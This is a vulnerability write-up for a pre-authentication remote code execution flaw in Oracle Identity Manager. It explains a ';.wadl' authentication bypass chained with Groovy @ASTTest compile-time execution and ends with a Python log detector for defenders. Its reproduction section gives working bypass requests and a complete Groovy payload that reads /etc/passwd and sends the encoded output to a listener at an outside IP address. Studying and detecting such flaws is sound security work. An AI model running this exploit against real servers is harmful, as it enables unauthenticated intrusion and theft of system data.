Knowledge Base

Identity Manager — CVE-2025-61757

Updated 26 May 2026

Background

Oracle Identity Manager Pre-Auth RCE

CVSS: 9.8 (Critical)
VECTOR: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
IMPACT: Remote code execution, information disclosure
AFFECTED: Oracle Identity Manager 12.2.1.4.0 and 14.1.2.1.0 without the October 2025 Critical Patch Update (CPU Oct 2025)

A pre-authentication remote code execution vulnerability in the REST WebServices component of Oracle Identity Manager (Oracle Fusion Middleware). The flaw chains an authentication bypass in the WSM security filter with an unintended code-execution primitive in a Groovy compilation endpoint, giving full RCE without credentials.

Authentication bypass — WADL_PATTERN

The REST endpoints under /iam/governance/applicationmanagement/api/v1/ are fronted by oracle.wsm.agent.handler.servlet.SecurityFilter. Inspection of the filter shows that it tests the request path against WADL_PATTERN before enforcing authentication, so that WADL descriptor requests can be served anonymously; any path matching the pattern skips authentication entirely. Because the match runs against the raw request URI, a path with a ;.wadl suffix appended also matches. The JAX-RS routing layer, however, treats everything after the ; as a matrix parameter and still dispatches the request to the original resource, so the suffix changes the filter's decision without changing which endpoint handles the request.

Figure: WADL_EXPRESSION and WADL_PATTERN constants

Figure: SecurityFilter WADL_PATTERN matcher check
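To make the filter/router mismatch concrete, the following Python model is an added example written for this page; it is not code from Oracle or from the original write-up. The WADL_PATTERN regex is an assumption standing in for the real constant, and the "hardened" variant is an assumed mitigation (normalising the path before the exemption check), not Oracle's actual patch.

```python
import re
from urllib.parse import urlsplit

# ASSUMPTION: approximation of the SecurityFilter exemption. The real
# WADL_EXPRESSION/WADL_PATTERN constants are not reproduced here; this
# regex only captures the property that matters for the bug: a ".wadl"
# suffix on the request path switches authentication off.
WADL_PATTERN = re.compile(r".*\.wadl$", re.IGNORECASE)

API_PREFIX = "/iam/governance/applicationmanagement/api/v1/"


def strip_matrix_params(path: str) -> str:
    """Drop ';name[=value]' matrix parameters from every path segment.

    This is what a JAX-RS router does before matching @Path templates,
    so 'groovyscriptstatus;.wadl' dispatches to 'groovyscriptstatus'.
    """
    return "/".join(seg.split(";", 1)[0] for seg in path.split("/"))


def vulnerable_filter_skips_auth(request_uri: str) -> bool:
    """Flawed check: tests the raw path, matrix parameters included."""
    return bool(WADL_PATTERN.match(urlsplit(request_uri).path))


def hardened_filter_skips_auth(request_uri: str) -> bool:
    """Same exemption, evaluated on the normalised path the router will
    actually use (assumed hardening, not Oracle's fix)."""
    path = strip_matrix_params(urlsplit(request_uri).path)
    return bool(WADL_PATTERN.match(path))


def routed_resource(request_uri: str) -> str:
    """Resource path the JAX-RS layer dispatches the request to."""
    return strip_matrix_params(urlsplit(request_uri).path)


def evaluate(request_uri: str, hardened: bool = False) -> dict:
    """Return what the filter decides and where the request ends up."""
    check = hardened_filter_skips_auth if hardened else vulnerable_filter_skips_auth
    return {"auth_skipped": check(request_uri), "routed_to": routed_resource(request_uri)}


if __name__ == "__main__":
    target = API_PREFIX + "applications/groovyscriptstatus"
    for uri in (target, target + ";.wadl", API_PREFIX + "application.wadl"):
        print(uri)
        print("  vulnerable:", evaluate(uri))
        print("  hardened:  ", evaluate(uri, hardened=True))
```

Running it shows the asymmetry the page describes: with the suffix the vulnerable check skips authentication while the router still lands on groovyscriptstatus; the normalised check keeps the exemption for a genuine application.wadl request and denies it for the matrix-parameter form. The more robust design is not to gate authentication on a regex over an unnormalised URI at all.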

RCE via Groovy AST transformation

One of the exposed endpoints, groovyscriptstatus, is intended only to compile a submitted Groovy script and report whether it is valid. Groovy's @ASTTest annotation, however, runs its closure inside the compiler during the selected compile phase via an AST transformation. Submitting a class annotated with @ASTTest therefore executes attacker-controlled code as the application user, even though the endpoint never "runs" the script. Compiling untrusted Groovy is not safe in general: the compiler runs AST transformations, and their code, with the application's privileges.

Combining the two: appending ;.wadl to the endpoint path bypasses authentication, and submitting a malicious @ASTTest-annotated Groovy class achieves RCE.

Figure: groovyscriptstatus endpoint @Path annotation

Reproduction

POC || GTFO

Step 1 — Confirm authentication bypass

A plain request to the endpoint returns 401. Appending ;.wadl to the path bypasses the SecurityFilter:

```http
POST /iam/governance/applicationmanagement/api/v1/applications/groovyscriptstatus HTTP/1.1
Host: kpen.dev.local:14000

→ HTTP/1.1 401 Unauthorized

POST /iam/governance/applicationmanagement/api/v1/applications/groovyscriptstatus;.wadl HTTP/1.1
Host: kpen.dev.local:14000

→ HTTP/1.1 200 OK — Script Compilation Successful
```

Step 2 — RCE via Groovy ASTTest exfil

File(s): http-exfil.py

Submit the following Groovy payload to the bypassed endpoint. The @ASTTest closure runs during the SEMANTIC_ANALYSIS compile phase, executes the embedded shell command and exfiltrates its base64url-encoded output to an attacker-controlled HTTP listener:

```groovy
POST /iam/governance/applicationmanagement/api/v1/applications/groovyscriptstatus;.wadl HTTP/1.1
Host: kpen.dev.local:14000
Content-Type: application/json

import groovy.transform.ASTTest
import org.codehaus.groovy.control.CompilePhase
import java.util.Base64

class Exfil {
    // The closure runs inside the compiler at SEMANTIC_ANALYSIS, so the
    // command executes even though the endpoint only compiles the script.
    @ASTTest(phase = CompilePhase.SEMANTIC_ANALYSIS, value = {
        try {
            def raw = ["sh", "-c", "cat /etc/passwd"].execute().text.bytes
            // base64url without padding keeps the output safe in a query string
            def data = Base64.getUrlEncoder()
                                .withoutPadding()
                                .encodeToString(raw)

            def url = "http://172.30.0.1:8888/?${data}"

            // deliver the encoded output to the listener
            def conn = new URL(url).openConnection()
            conn.requestMethod = "GET"
            conn.inputStream.text
        } catch (ignored) {}   // swallow errors so the compile result is not disturbed
    })
    static void main(String[] args) {}
}

Exfil.main()
```

Figure: Running http-exfil.py to extract /etc/passwd
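For defenders, the following Python detection is an added example, not part of the original page, that scans web-server access logs for the two artifacts the procedure above leaves behind: a matrix-parameter .wadl suffix on an IDM REST path, and POST requests to the groovyscriptstatus endpoint. The sample log lines are constructed for this example, and the Apache/OHS combined log format is an assumption about the deployment.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample lines in Apache/OHS combined log format (assumption about
# the front-end's log format). Addresses, users and timestamps are invented.
SAMPLE_LOG = """\
172.30.0.50 - - [25/Nov/2025:10:14:02 +0000] "POST /iam/governance/applicationmanagement/api/v1/applications/groovyscriptstatus HTTP/1.1" 401 0 "-" "python-requests/2.32"
172.30.0.50 - - [25/Nov/2025:10:14:03 +0000] "POST /iam/governance/applicationmanagement/api/v1/applications/groovyscriptstatus;.wadl HTTP/1.1" 200 31 "-" "python-requests/2.32"
10.0.0.12 - admin [25/Nov/2025:10:20:11 +0000] "GET /iam/governance/applicationmanagement/api/v1/applications HTTP/1.1" 200 1811 "-" "Mozilla/5.0"
10.0.0.12 - - [25/Nov/2025:10:21:40 +0000] "GET /iam/governance/applicationmanagement/api/v1/application.wadl HTTP/1.1" 200 9123 "-" "curl/8.5.0"
172.30.0.50 - - [25/Nov/2025:10:22:05 +0000] "POST /iam/governance/applicationmanagement/api/v1/applications/groovyscriptstatus;.WADL HTTP/1.1" 200 31 "-" "python-requests/2.32"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

IDM_REST_PREFIX = "/iam/governance/"

# A matrix parameter (';...') whose name ends in .wadl, e.g. 'groovyscriptstatus;.wadl'.
# A legitimate WADL fetch such as '/application.wadl' carries no ';' and does not match.
MATRIX_WADL_RE = re.compile(r";[^/?;]*\.wadl(?=$|[/?;])", re.IGNORECASE)


@dataclass
class Finding:
    ip: str
    ts: str
    method: str
    target: str
    status: int
    severity: str
    reason: str


def normalize_path(path: str) -> str:
    """Strip matrix parameters from each segment, as the JAX-RS router does."""
    return "/".join(seg.split(";", 1)[0] for seg in path.split("/"))


def classify(line: str) -> Optional[Finding]:
    """Return a Finding for a suspicious IDM REST request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = m["target"].split("?", 1)[0]
    if not path.startswith(IDM_REST_PREFIX):
        return None
    status = int(m["status"])
    bypass_suffix = bool(MATRIX_WADL_RE.search(path))
    groovy_compile = m["method"] == "POST" and normalize_path(path).endswith("/groovyscriptstatus")
    if bypass_suffix and groovy_compile and status < 400:
        sev, why = "high", "unauthenticated Groovy compile request accepted via ;.wadl bypass"
    elif bypass_suffix:
        sev, why = "high", "matrix-parameter .wadl suffix on IDM REST path (auth bypass pattern)"
    elif groovy_compile:
        sev, why = "medium", "POST to groovyscriptstatus (review caller and request body)"
    else:
        return None
    return Finding(m["ip"], m["ts"], m["method"], m["target"], status, sev, why)


def scan(log_text: str) -> List[Finding]:
    """Classify every line of an access log and keep the findings."""
    return [f for f in (classify(line) for line in log_text.splitlines()) if f]


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"[{f.severity}] {f.ts} {f.ip} {f.method} {f.target} -> {f.status}: {f.reason}")
```

The strongest signal is a 2xx response to a request that should have required authentication, which is why a successful groovyscriptstatus POST carrying the suffix is rated separately from a bare probe. The pattern keys on any matrix parameter ending in .wadl rather than the literal ;.wadl so that case and padding variants are caught; if a reverse proxy in front of the server rewrites or strips matrix parameters before logging, the detection must run on the WebLogic or OHS logs closest to the application.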
